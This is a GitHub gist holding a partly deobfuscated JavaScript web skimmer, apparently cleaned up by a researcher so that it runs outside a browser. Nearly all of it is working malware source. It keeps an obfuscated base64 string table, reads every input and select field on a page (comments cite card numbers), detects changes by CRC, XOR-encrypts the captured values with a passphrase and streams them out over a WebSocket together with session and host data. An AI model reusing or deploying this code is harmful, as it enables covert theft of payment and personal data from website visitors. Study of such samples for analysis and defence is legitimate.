Skip to content

Instantly share code, notes, and snippets.

@krautface

krautface/websocket-skimmer-cleaned.js Secret

Last active December 17, 2019 23:25
Show Gist options
  • Save krautface/1bd0883eab559c07ea4d324ad860fc85 to your computer and use it in GitHub Desktop.
Save krautface/1bd0883eab559c07ea4d324ad860fc85 to your computer and use it in GitHub Desktop.
Download ZIP
A somewhat cleaned up version of the skimmer that is also runnable outside of a browser. Install the required npm libraries at the top.
Raw
websocket-skimmer-cleaned.js
// const Window = require('window');
// const window = new Window();
// const { document } = new Window();
var atob = require('atob');
var navigator = {
userAgent: "useragent 123"
}
var location = {
host: "www.example.org"
}
const jsdom = require("jsdom");
const { JSDOM } = jsdom;
const { window } = new JSDOM(`<!DOCTYPE html><p>Hello world</p>`, {
url: "https://example.org/",
referrer: "https://example.com/",
contentType: "text/html",
includeNodeLocations: true,
storageQuota: 10000000
});
var a = "cHVzaA== YXBwbHk= ZnVuY3Rpb24= RXhwZWN0ZWQgYSBmdW5jdGlvbg== bGVuZ3Ro Y2FsbA== W29iamVjdCBGdW5jdGlvbl0= W29iamVjdCBHZW5lcmF0b3JGdW5jdGlvbl0= W29iamVjdCBBc3luY0Z1bmN0aW9uXQ== W29iamVjdCBQcm94eV0= b2JqZWN0 Y2hhaW4= cHJvdG90eXBl dmFsdWU= c291cmNl T2JqZWN0 cmV0dXJuIHRoaXM= JmFtcDs= Jmx0Ow== Jmd0Ow== JnF1b3Q7 JiMzOTs= aGFzT3duUHJvcGVydHk= dG9TdHJpbmc= Y3JlYXRl a2V5cw== bWF4 Y29uc3RydWN0b3I= bnVtYmVy ZXh0ZW5k ZXNjYXBl c3RyaW5n dGVzdA== cmVwbGFjZQ== VkVSU0lPTg== NC4xNy4y dG9KU09O dmFsdWVPZg== c2xpY2U= dHlwZXM= Y2FsbGVl Z2V0VGltZQ== bWV0aG9k ZnJvbUNoYXJDb2Rl c3BsaXQ= bWFw Y2hhckNvZGVBdA== am9pbg== Y2hhckF0 PT09 aW5kZXhPZg== cmV0dXJuICJaIlsiY28iWyJjbyIrIm4iKyJjYXQiXSgibmMiLCJhdCIpXSgiWVgiWyJjbyJbImNvIisibiIrImNhdCJdKCJuYyIsImF0IildKCJXIiwgIlZVVFNSIiwgIlEiWyJjbyJbImNvIisibiIrImNhdCJdKCJuYyIsImF0IildKCJQT04iLCJNTEsiLCJKSUhHRiJbImNvIlsiY28iKyJuIisiY2F0Il0oIm5jIiwiYXQiKV0oIkVEQyIsIkJBeiIsInkiLCJ4IikpKSlbImNvIlsiY28iKyJuIisiY2F0Il0oIm5jIiwiYXQiKV0oInciLCJ2dXQiLCJzcnFwb24iLCJtbCIsImsiLCJqIlsiY28iWyJjbyIrIm4iKyJjYXQiXSgibmMiLCJhdCIpXSgiaWgiLCAiZ2ZlZGNiYSIsIjkiLCI4NzYiLCI1NDMiLCIyMTAiWyJjbyJbImNvIisibiIrImNhdCJdKCJuYyIsImF0IildKCIrIiksIi8iLCI9Iikp V2ViU29ja2V0 TW96V2ViU29ja2V0 Y29uc29sZQ== c2V0 cmVtb3Zl Z2V0 aGVhZA== Z2V0RWxlbWVudHNCeVRhZ05hbWU= ZG9jdW1lbnRFbGVtZW50 Zmlyc3RDaGlsZA== YWNjZXB0 X19hY2NlcHREYXRhXw== d25k Z19yZXFfaGFuZGxlcl9zbmdsdG4= Z19yZXFfaGFuZGxlcl9hY2NlcHRvcg== b25vcGVu b25jbG9zZQ== b25lcnJvcg== b25tZXNzYWdl Zmxvb3I= U1BIUkFTRQ== U0VTU0lE VVNFUkFHRU5U TE9DQVRJT04= SE9TVElE c3RyaW5naWZ5 c2VuZA== SU5JVA== Q09SRV9VUERBVEVfUEVSSU9E MDAwMDAwMDAgNzcwNzMwOTYgRUUwRTYxMkMgOTkwOTUxQkEgMDc2REM0MTkgNzA2QUY0OEYgRTk2M0E1MzUgOUU2NDk1QTMgMEVEQjg4MzIgNzlEQ0I4QTQgRTBENUU5MUUgOTdEMkQ5ODggMDlCNjRDMkIgN0VCMTdDQkQgRTdCODJEMDcgOTBCRjFEOTEgMURCNzEwNjQgNkFCMDIwRjIgRjNCOTcxNDggODRCRTQxREUgMUFEQUQ0N0QgNkREREU0RUIgRjRENEI1NTEgODNEMzg1QzcgMTM2Qzk4NTYgNjQ2QkE4QzAgRkQ2MkY5N0EgOEE2NUM5RUMgMTQwMTVDNEYgNjMwNjZDRDkgRkEwRjNENjMgOEQwODBERjUgM0I2RTIwQzggNEM2OTEwNUUgRDU2MDQxRTQgQTI2NzcxNzIgM0MwM0U0RDEgNEIwNEQ0NDcgRDIwRDg1RkQgQTUwQUI1NkIgMzVCNUE4RkEgNDJCMjk4NkMgREJCQkM5RDYgQUNCQ0Y5NDAgMzJEODZDRTMgNDVERjVDNzUgRENENjBEQ0YgQUJEMTNENTkgMjZEOTMwQUMgNTFERTAwM0EgQzhENzUxODAgQkZEMDYxMTYgMjFCNEY0QjUgNTZCM0M0MjMgQ0ZCQTk1OTkgQjhCREE1MEYgMjgwMkI4OUUgNUYwNTg4MDggQzYwQ0Q5QjIgQjEwQkU5MjQgMkY2RjdDODcgNTg2ODRDMTEgQzE2MTFEQUIgQjY2NjJEM0QgNzZEQzQxOTAgMDFEQjcxMDYgOThEMjIwQkMgRUZENTEwMkEgNzFCMTg1ODkgMDZCNkI1MUYgOUZCRkU0QTUgRThCOEQ0MzMgNzgwN0M5QTIgMEYwMEY5MzQgOTYwOUE4OEUgRTEwRTk4MTggN0Y2QTBEQkIgMDg2RDNEMkQgOTE2NDZDOTcgRTY2MzVDMDEgNkI2QjUxRjQgMUM2QzYxNjIgODU2NTMwRDggRjI2MjAwNEUgNkMwNjk1RUQgMUIwMUE1N0IgODIwOEY0QzEgRjUwRkM0NTcgNjVCMEQ5QzYgMTJCN0U5NTAgOEJCRUI4RUEgRkNCOTg4N0MgNjJERDFEREYgMTVEQTJENDkgOENEMzdDRjMgRkJENDRDNjUgNERCMjYxNTggM0FCNTUxQ0UgQTNCQzAwNzQgRDRCQjMwRTIgNEFERkE1NDEgM0REODk1RDcgQTREMUM0NkQgRDNENkY0RkIgNDM2OUU5NkEgMzQ2RUQ5RkMgQUQ2Nzg4NDYgREE2MEI4RDAgNDQwNDJENzMgMzMwMzFERTUgQUEwQTRDNUYgREQwRDdDQzkgNTAwNTcxM0MgMjcwMjQxQUEgQkUwQjEwMTAgQzkwQzIwODYgNTc2OEI1MjUgMjA2Rjg1QjMgQjk2NkQ0MDkgQ0U2MUU0OUYgNUVERUY5MEUgMjlEOUM5OTggQjBEMDk4MjIgQzdEN0E4QjQgNTlCMzNEMTcgMkVCNDBEODEgQjdCRDVDM0IgQzBCQTZDQUQgRURCODgzMjAgOUFCRkIzQjYgMDNCNkUyMEMgNzRCMUQyOUEgRUFENTQ3MzkgOUREMjc3QUYgMDREQjI2MTUgNzNEQzE2ODMgRTM2MzBCMTIgOTQ2NDNCODQgMEQ2RDZBM0UgN0E2QTVBQTggRTQwRUNGMEIgOTMwOUZGOUQgMEEwMEFFMjcgN0QwNzlFQjEgRjAwRjkzNDQgODcwOEEzRDIgMUUwMUYyNjggNjkwNkMyRkUgRjc2MjU3NUQgODA2NTY3Q0IgMTk2QzM2NzEgNkU2QjA2RTcgRkVENDFCNzYgODlEMzJCRTAgMTBEQTdBNUEgNjdERDRBQ0MgRjlCOURGNkYgOEVCRUVGRjkgMTdCN0JFNDMgNjBCMDhFRDUgRDZENkEzRTggQTFEMTkzN0UgMzhEOEMyQzQgNEZERkYyNTIgRDFCQjY3RjEgQTZCQzU3NjcgM0ZCNTA2REQgNDhCMjM2NEIgRDgwRDJCREEgQUYwQTFCNEMgMzYwMzRBRjYgNDEwNDdBNjAgREY2MEVGQzMgQTg2N0RGNTUgMzE2RThFRUYgNDY2OUJFNzkgQ0I2MUIzOEMgQkM2NjgzMUEgMjU2RkQyQTAgNTI2OEUyMzYgQ0MwQzc3OTUgQkIwQjQ3MDMgMjIwMjE2QjkgNTUwNTI2MkYgQzVCQTNCQkUgQjJCRDBCMjggMkJCNDVBOTIgNUNCMzZBMDQgQzJEN0ZGQTcgQjVEMENGMzEgMkNEOTlFOEIgNUJERUFFMUQgOUI2NEMyQjAgRUM2M0YyMjYgNzU2QUEzOUMgMDI2RDkzMEEgOUMwOTA2QTkgRUIwRTM2M0YgNzIwNzY3ODUgMDUwMDU3MTMgOTVCRjRBODIgRTJCODdBMTQgN0JCMTJCQUUgMENCNjFCMzggOTJEMjhFOUIgRTVENUJFMEQgN0NEQ0VGQjcgMEJEQkRGMjEgODZEM0QyRDQgRjFENEUyNDIgNjhEREIzRjggMUZEQTgzNkUgODFCRTE2Q0QgRjZCOTI2NUIgNkZCMDc3RTEgMThCNzQ3NzcgODgwODVBRTYgRkYwRjZBNzAgNjYwNjNCQ0EgMTEwMTBCNUMgOEY2NTlFRkYgRjg2MkFFNjkgNjE2QkZGRDMgMTY2Q0NGNDUgQTAwQUUyNzggRDcwREQyRUUgNEUwNDgzNTQgMzkwM0IzQzIgQTc2NzI2NjEgRDA2MDE2RjcgNDk2OTQ3NEQgM0U2RTc3REIgQUVEMTZBNEEgRDlENjVBREMgNDBERjBCNjYgMzdEODNCRjAgQTlCQ0FFNTMgREVCQjlFQzUgNDdCMkNGN0YgMzBCNUZGRTkgQkRCREYyMUMgQ0FCQUMyOEEgNTNCMzkzMzAgMjRCNEEzQTYgQkFEMDM2MDUgQ0RENzA2OTMgNTRERTU3MjkgMjNEOTY3QkYgQjM2NjdBMkUgQzQ2MTRBQjggNUQ2ODFCMDIgMkE2RjJCOTQgQjQwQkJFMzcgQzMwQzhFQTEgNUEwNURGMUIgMkQwMkVGOEQ= Q1JD cXVlcnlTZWxlY3RvckFsbA== REVGQVVMVF9UWFRfRklFTEQ= c2VsZWN0LCBpbnB1dA== Z2V0QXR0cmlidXRl bmFtZQ== dGFnTmFtZQ== dG9Mb3dlckNhc2U= c2VhcmNo c2VsZWN0 b3B0aW9ucw== c2VsZWN0ZWRJbmRleA== dGV4dA== RklFTERTX0ZJTFRFUg== aGFzQXR0cmlidXRl RVhUUkFfVFhUX0ZJRUxEUw== cXVlcnlTZWxlY3Rvcg== aW5uZXJIVE1MfG91dGVySFRNTA== RVhUUkFfRklFTERf c2V0RGF0YQ== dXNlckFnZW50 aG9zdA==".split(" ");
function L(t)
{
t -= 0;
var v = a[t];
void 0 === L.UYZOVc && (function ()
{
var r = "undefined" !== typeof window ? window : "object" === typeof process && "function" === typeof require && "object" === typeof global ? global : this;
r.atob || (r.atob = function (l)
{
l = String(l).replace(/=+$/, "");
for (var q = 0, f, m, b = 0, c = ""; m = l.charAt(b++); ~m && (f = q % 4 ? 64 * f + m : m, q++ % 4) ? c += String.fromCharCode(255 & f >> (-2 * q & 6)) : 0) m = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=".indexOf(m);
return c
})
}(), L.fOfALT = function (r)
{
r = atob(r);
for (var l = [],
q = 0, f = r.length; q < f; q++) l += "%" + ("00" + r.charCodeAt(q).toString(16)).slice(-2);
return decodeURIComponent(l)
}, L.SqaMeO = {}, L.UYZOVc = !0);
var A = L.SqaMeO[t];
void 0 === A ? (v = L.fOfALT(v), L.SqaMeO[t] = v) : v = A;
return v
}
(function (t, v, A, r, l)
{
(function (b)
{
function c()
{}
var d = function ()
{
function b(x, c)
{
x["push"]["apply"](x, c);
return x
}
function c(b)
{
return b instanceof d ? b : new d(b)
}
function d(b, c)
{
this.J = b;
this.m = [];
this.F = !!c
}
function e(b, c, C)
{
if ("function" != typeof b) throw new TypeError("Expected a function");
return setTimeout(function ()
{
b["apply"](y, C)
}, c)
}
function u(b, c)
{
var C = [];
E(b, function (b, x, d)
{
c(b, x, d) && C["push"](b)
});
return C
}
function w(b, c)
{
return b && M(b, c, D)
}
function f(b, c)
{
return u(c, function (c)
{
return r(b[c])
})
}
function p(b)
{
return N(q(b, v), b + "")
}
function s(c, d)
{
return reduce(d, function (c, x)
{
return x.Da["apply"](x.Ma, b([c], x.ua))
}, c)
}
function l(b, c, d, g)
{
var k = !d;
d || (d = {});
for (var e = -1, u = c["length"]; ++e < u;)
{
var h = c[e],
f = g ? g(d[h], b[h], h, d, b) : y;
f === y && (f = b[h]);
if (k) d[h] = f;
else
{
var n = d,
w = n[h];
F["call"](n, h) && (w === f || w !== w && f !== f) && (f !== y || h in n) || (n[h] = f)
}
}
}
function m(b)
{
return p(function (c, d)
{
var g = -1,
k = d["length"],
e = 1 < k ? d[k - 1] : y,
e = 3 < b["length"] && "function" == typeof e ? (k--, e) : y;
for (c = Object(c); ++g < k;)
{
var h =
d[g];
h && b(c, h, g, e)
}
return c
})
}
function K(b)
{
var c = [];
if (null != b)
for (var d in Object(b)) c["push"](d);
return c
}
function q(b, c)
{
var d = void 0,
d = G(d === y ? b["length"] - 1 : d, 0);
return function ()
{
for (var g = arguments, k = -1, e = G(g["length"] - d, 0), h = Array(e); ++k < e;) h[k] = g[d + k];
k = -1;
for (e = Array(d + 1); ++k < d;) e[k] = g[k];
e[d] = c(h);
return b["apply"](this, e)
}
}
function r(b)
{
if (!t(b)) return !1;
b = O["call"](b);
return L("0x6") == b || L("0x7") == b || L("0x8") == b || L("0x9") == b
// L("0x6")
// "[object Function]"
// L("0x7")
// "[object GeneratorFunction]"
// L("0x8")
// "[object AsyncFunction]"
// L("0x9")
// "[object Proxy]"
}
function t(b)
{
var c = typeof b;
return null != b && ("object" ==
c || "function" == c)
}
function v(b)
{
return b
}
function A(c, d, e)
{
var g = D(d),
h = f(d, g);
null != e || t(d) && (h["length"] || !g["length"]) || (e = d, d = c, c = this, h = f(d, D(d)));
var u = !(t(e) && L("0xb") in e) || !!e.ya,
n = r(c);
E(h, function (e)
{
var g = d[e];
c[e] = g;
n && (c["prototype"][e] = function ()
{
var d = this.F;
if (u || d)
{
var e = c(this.J),
h = this.m,
f = h,
n = h["length"],
h = 0,
w = -1,
z = f["length"];
0 > h && (h = -h > z ? 0 : z + h);
n = n > z ? z : n;
0 > n && (n += z);
z = h > n ? 0 : n - h >>> 0;
h >>>= 0;
for (n = Array(z); ++w < z;) n[w] = f[w + h];
(e.m = n)["push"](
{
func: g,
args: arguments,
thisArg: c
});
e.F =
d;
return e
}
return g["apply"](c, b([this["value"]()], arguments))
})
})
}
var y, H = /[&<>"']/g,
P = RegExp(H[L("0xe")]),
B = "object" == typeof self && self && self["Object"] === Object && self;
"object" == typeof global && global && global["Object"] === Object && global || B || Function("return this")();
var Q = function (b)
{
return function (c)
{
return null == b ? y : b[c]
}
}(
{
"&": "&amp;",
"<": "&lt;",
">": "&gt;",
'"': "&quot;",
"'": "&#39;"
}),
B = Object["prototype"],
F = B["hasOwnProperty"],
O = B["toString"],
I = Object["create"],
B = function (b, c)
{
return function (d)
{
return b(c(d))
}
}(Object["keys"],
Object),
G = Math["max"];
d["prototype"] = function ()
{
function b()
{}
return function (c)
{
if (!t(c)) return {};
if (I) return I(c);
b["prototype"] = c;
c = new b;
b["prototype"] = y;
return c
}
}()(c["prototype"]);
d["prototype"]["constructor"] = d;
var E = function (b, c)
{
return function (d, e)
{
if (null == d) return d;
var g;
(g = null == d) || (g = d["length"], g = !("number" == typeof g && -1 < g && 0 == g % 1 && 9007199254740991 >= g));
if (g || r(d)) return b(d, e);
g = d["length"];
for (var k = c ? g : -1, h = Object(d);
(c ? k-- : ++k < g) && !1 !== e(h[k], k, h););
return d
}
}(w),
M = function (b)
{
return function (c,
d, g)
{
var e = -1,
k = Object(c);
g = g(c);
for (var h = g["length"]; h--;)
{
var n = g[b ? h : ++e];
if (!1 === d(k[n], n, k)) break
}
return c
}
}(),
N = v;
p(function (b, c, d)
{
return e(b, R(c) || 0, d)
});
var R = Number,
J = m(function (b, c)
{
l(c, K(c), b)
});
m(function (b, c, d, g)
{
l(c, S(c), b, g)
});
var D = B,
S = K;
c.va = J;
c["extend"] = J;
A(c, c);
c["escape"] = function (b)
{
return (b = "string" == typeof b ? b : null == b ? "" : b + "") && P["test"](b) ? b["replace"](H, Q) : b
};
A(c, function ()
{
var b = {};
w(c, function (d, e)
{
F["call"](c["prototype"], e) || (b[e] = d)
});
return b
}(),
{
chain: !1
});
c["VERSION"] = "4.17.2";
c["prototype"]["toJSON"] = c["prototype"]["valueOf"] = c["prototype"]["value"] = function ()
{
return s(this.J, this.m)
};
return c
}["call"](this),
p = {
Function:
{
ba: function (b)
{
setTimeout(this, b);
return this
},
e: function (b)
{
var c = this;
return function ()
{
return c["apply"](b || null, arguments)
}
},
Ia: function (b)
{
var c = this,
d = !0,
e = 1 < arguments["length"] && Array["prototype"]["slice"]["call"](arguments, 1) || null;
return function ()
{
d && (d = null, c["apply"](this, e || arguments), c = e = null)
}.ba(b)
}
}
};
b.aa = function (c,
e, h)
{
function n(b, c)
{
if (b && f[b])
{
try
{
f[b](b, c)
}
catch (d)
{}
delete f[b]
}
}
var f = {};
c[e] = c[e] ||
{};
c[e][h] = n;
return function (c, e)
{
var g = b.r();
f[g] = c;
e && d.Aa(n, e, g, null);
return g
}
};
b["types"] = {};
b["types"].ha = {};
b["types"].Ba = {};
b["types"].V = function (c, e)
{
var h = b["types"].ha[c];
if (!h) return null;
e = e || null;
var n = {};
d["extend"](n, h);
return function (b)
{
if (b)
for (var c in h) arguments[L("0x28")][c] = n[c] = b[c] || e;
return n
}
};
for (var s in p) {
window['Function'] = Function; // addition
window['Function'].prototype = Function.prototype; // addition
d["extend"](window[s]["prototype"], p[s]);
}
var e = [],
u = b.j.A,
f = {
i: function (c)
{
c =
c || this;
return c.H ? c.H : c.H = b.r()
},
$: function (b, c)
{
e["push"](
{
g: this,
Q: c,
B: b
})
},
method: function (b, c)
{
var d = c || this,
e = this.i(c),
f, p;
for (p in b) return f = b[p], this["prototype"][p] = function ()
{
var b = this.c,
c = this.a,
g = this.t;
try
{
return this.t = e, this.a = this.I[e] || (this.I[e] = {}), this.c = d.v && d.v[p] || u, f["apply"](this, arguments)
}
catch (k)
{}
finally
{
this.c = b, this.a = c, this.t = g
}
}, this.i(this["prototype"][p]), this["prototype"][p]
}
};
c["prototype"] = { // c.prototype
i: f.i,
u: d,
ea: b["types"].V,
s: b,
ia: function ()
{
return (new Date)["getTime"]()
},
fa: function (b, c)
{
for (c in b) this[c] = this[c]
}
};
Function["prototype"].d = function (b)
{
function e()
{
this.I = {};
this.fa(
{
u: null
});
return this.M["apply"](this, arguments)
}
function h()
{}
b = b || c;
h["prototype"] = b["prototype"];
e["prototype"] = new h;
e.v = b["prototype"];
d["extend"](e, f);
e.$(b, this);
return e
};
Function["prototype"].D = function ()
{
for (var b = e["length"], c, d, f, u; 0 < b--;)
{
c = e[b];
f = c.g["prototype"];
for (d in f) f["hasOwnProperty"](d) && (u = {}, u[d] = f[d], c.g["method"](u));
c.g["method"](
{
c: c.B
}, c.B);
c.g["method"](
{
M: c.Q
})
}
}
})(function ()
{
var b = {
j:
{}
};
b.j.ka = [];
b.j.A = function () {};
b.S = function (b)
{
function d(b)
{
return encodeURIComponent(b)["replace"](/%([0-9A-F]{2})/g, function (b, c)
{
return String["fromCharCode"]("0x" + c)
})
}
function f(b)
{
return decodeURIComponent(b["split"]("")["map"](function (b)
{
return "%" + ("00" + b["charCodeAt"](0)["toString"](16))["slice"](-2)
})["join"](""))
}
var s = (new Function(b))();
return {
Z: function (b)
{
var c, f, k, g, h = 0,
n = 0,
p = "",
p = [];
if (!b) return b;
b = d(b);
do c = b["charCodeAt"](h++), f = b["charCodeAt"](h++), k = b["charCodeAt"](h++), g = c <<
16 | f << 8 | k, c = g >> 18 & 63, f = g >> 12 & 63, k = g >> 6 & 63, g &= 63, p[n++] = s["charAt"](c) + s["charAt"](f) + s["charAt"](k) + s["charAt"](g); while (h < b["length"]);
p = p["join"]("");
b = b["length"] % 3;
return (b ? p["slice"](0, b - 3) : p) + L("0x31")["slice"](b || 3)
},
xa: function (b)
{
var c, d, k, g, h, n = 0,
l = 0,
m = [];
if (!b) return b;
b += "";
do c = s["indexOf"](b["charAt"](n++)), d = s["indexOf"](b["charAt"](n++)), g = s["indexOf"](b["charAt"](n++)), h = s["indexOf"](b["charAt"](n++)), k = c << 18 | d << 12 | g << 6 | h, c = k >> 16 & 255, d = k >> 8 & 255, k &= 255, 64 === g ? m[l++] =
String["fromCharCode"](c) : 64 === h ? m[l++] = String["fromCharCode"](c, d) : m[l++] = String["fromCharCode"](c, d, k); while (n < b["length"]);
g = m["join"]("");
return f(g["replace"](/\0+$/, ""))
}
}
}(L("0x33"));
b.r = function ()
{
var b = 0;
return function ()
{
return b += 1
}
}();
b.Ea = function ()
{
return window["WebSocket"] || window["MozWebSocket"] || null
};
window["console"] = window["console"] || // window.console = window.console || {log: function() {}}
{
log: b.j.A
};
return b
}());
var q = function () {}.d();
q["prototype"]["set"] = function (b, c)
{
this.a[b] = c
};
q["prototype"]["remove"] = function (b)
{
delete this.a[b]
};
q["prototype"]["get"] =
function (b)
{
return this.a[b]
};
var f = function ()
{
this.a.Y = {
doc: document,
wnd: window,
head: document["head"] || document["getElementsByTagName"]("head")[0] || document["documentElement"]["firstChild"],
g_req_handler_acceptor: "accept",
g_req_handler_sngltn: "__acceptData_" + this.ia() // return (new Date)["getTime"]()
}
}.d();
f["prototype"].f = function (b)
{
return this.a.Y[b] || null
};
(function (b, c, d)
{
this.a.Ka = b;
this.a.za = c;
this.a.Ha = d;
this.a.ta = {};
this.c()
}).d();
(function ()
{
this.c();
this.a.Ca = this.s.aa(this.f("wnd"), this.f("g_req_handler_sngltn"), this.f("g_req_handler_acceptor"));
this.a.Ja = this.f("g_req_handler_sngltn") +
"." + this.f("g_req_handler_acceptor")
}).d(f);
(function (b, c)
{
this.a.Ga = b || null;
this.a.La = c && this.ea(c) || null
}).d();
var f = function (b)
{
this.c();
this.a.sa = b ||
{};
this.a.wa = !1
}.d(),
m = function (b, c)
{
this.c();
var d = this.a;
d.ra = [];
d.Fa = 1;
d.qa = this.s.r();
d.l = b;
d.C = !0;
d.T = !1;
d.b = c;
d.k = !1;
this.da()
}.d();
m["prototype"].da = function ()
{
if (this.a.l && !this.a.k)
{
this.q = this.q.e(this);
this.G = this.G.e(this);
this.n = this.n.e(this);
this.o = this.o.e(this);
this.p = this.p.e(this);
var b = this.a.l;
b["onopen"] = this.q;
b["onclose"] = this.n;
b["onerror"] =
this.o;
b["onmessage"] = this.p;
this.a.k = !0
}
};
m["prototype"].G = function () {};
m["prototype"].q = function () {};
m["prototype"].n = function (b)
{
var c = this.a;
c.C = !1;
c.T = !1;
c.la = b
};
m["prototype"].o = function () {};
m["prototype"].p = function () {};
m["prototype"].ja = function (b, c)
{
for (var d = 0, f = c["length"], m = []; d < f; d++) {
m["push"](String["fromCharCode"](c["charCodeAt"](d) ^ b["charCodeAt"](Math["floor"](d % b["length"]))));
}
return m["join"]("")
};
m["prototype"].ca = function (b)
{
b = this.ja(this.a.b["get"]("SPHRASE"), b); // encrypt with phrase? - cLdFHRFn
b = this.s.S.Z(b);
return encodeURIComponent(b)
};
m["prototype"].X = function (b)
{
var c = this.a;
if (c.C)
{
b = {
sess_id: c.b["get"]("SESSID"),
cmd: "push",
info:
{
user_ua: c.b["get"]("USERAGENT"),
url: c.b["get"]("LOCATION"),
sess_host_id: c.b["get"]("HOSTID")
},
data_include: b || ""
};
c = null;
try
{
c = JSON["stringify"](b)
}
catch (d)
{}
c && (b = {
data: b
}, c = this.ca(JSON["stringify"](b)), this.a.l["send"](c)) // encrypt payload with SPHRASE and exfil?
}
};
f = function (b)
{
var c = this.a;
this.c();
c.N = b ||
{};
c.pa = "";
c.b = null;
c.w = null;
c.k = !1;
c.oa = !1;
c.ma = !1;
c.b = new q;
c.O = {};
c.h = {};
c.na = 0;
this["INIT"]()
}.d(f);
f["prototype"].U =
function ()
{
var b = this.a;
this.ga();
for (var c in b.h)
{
try
{
var d = JSON["stringify"](b.h);
this.R(d)
}
catch (f)
{}
b.h = {};
break
}
this.L()
};
f["prototype"].W = function (b, c)
{
return function (b, c)
{
return function ()
{
setTimeout(b, c)
}
}(b.e(this), c, b = c = null)
};
f["prototype"]["INIT"] = function (b)
{
this.a.w = new m(b, this.a.b);
this.L = this.W(this.U, this.a.b["get"]("CORE_UPDATE_PERIOD") || 1E3);
this.L()
};
f["prototype"].P = function ()
{
var b = L("0x51")["split"](" ")["map"](function (b) // the long CRC string is 0x51
{
return parseInt(b, 16)
});
return function (c)
{
c = "" + c;
for (var d = -1, f = 0, m = c["length"]; f < m; f++) d = d >>> 8 ^ b[(d ^ c["charCodeAt"](f)) & 255];
return (d ^ -1) >>> 0
}
}();
f["prototype"].K = function (b, c)
{
var d = this.a,
f = d.O,
m = this.P(c);
if (f[b] || m) f[b] && f[b]["CRC"] === m || (f[b] = {
VAL: c,
CRC: m,
NM: b
}, d.h[b] = c)
};
f["prototype"].ga = function ()
{
for (var b = this.a.N, c = document["querySelectorAll"](b["DEFAULT_TXT_FIELD"] || "select, input"), d, f, m, e, l, q, k = c["length"]; k--;)
{
l = c[k]; // get k input field from input field array
e = [l["getAttribute"]("name"), l["getAttribute"]("id")]; // ex: l['credit_card', 'ccnum']
m = e["join"]("::"); // ex: 'credit_card::ccnum
e = l["value"]; // ex: 4111123412341234
- 1 !== l["tagName"]["toLowerCase"]()["search"]("select") && l["options"]["length"] &&
/^\d+$/ ["test"](e) && (e = l["options"][l["selectedIndex"]]["text"]);
if (b["FIELDS_FILTER"])
{
f = b["FIELDS_FILTER"];
q = !1;
for (d in f)
if (f[d] && l["hasAttribute"](d) && !~(l["getAttribute"](d) || "")["search"](f[d]))
{
q = !0;
break
}
if (q) continue
}
this.K(m, e)
}
if (b["EXTRA_TXT_FIELDS"]) {
for (d in b = b["EXTRA_TXT_FIELDS"], c = 0, b) {
c++;
e = (l = document["querySelector"](d)) && l[b[d]] || "";
e = e["replace"](/[\s\r\n]+/g, " ");
~b[d]["search"]("innerHTML|outerHTML") && (e = this.u["escape"](e));
e && this.K("EXTRA_FIELD_" + c, e);
}
}
};
f["prototype"].R = function (b)
{
this.a.w.X(b)
};
f["prototype"]["setData"] = function (b, c)
{
this.a.b["set"](b,
c)
};
Function.D();
delete Function.D;
l = new f(l);
l["setData"]("USERAGENT", navigator["userAgent"]); // l.setData("USERAGENT", navigator['userAgent'])
l["setData"]("HOSTID", v); // l.setData('HOSTID', <location.host>) // passed in below
l["setData"]("LOCATION", location["host"]); // l.setData('LOCATION', location[host])
l["setData"]("SPHRASE", A); // l.setData('SPHRASE', 'cLdFHRFn') // passed in below
l["setData"]("SESSID", r); // l.setData('SESSID', '47f3d53a0bc21fd43207889f1958bba9') // passed in below
l["setData"]("CORE_UPDATE_PERIOD", 300); // l.setData('CORE_UPDATE_PERIOD', 300)
l["INIT"](t) // l['INIT'](window)
})
(this, "www.example.com", "cLdFHRFn", "47f3d53a0bc21fd43207889f1958bba9",{})
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment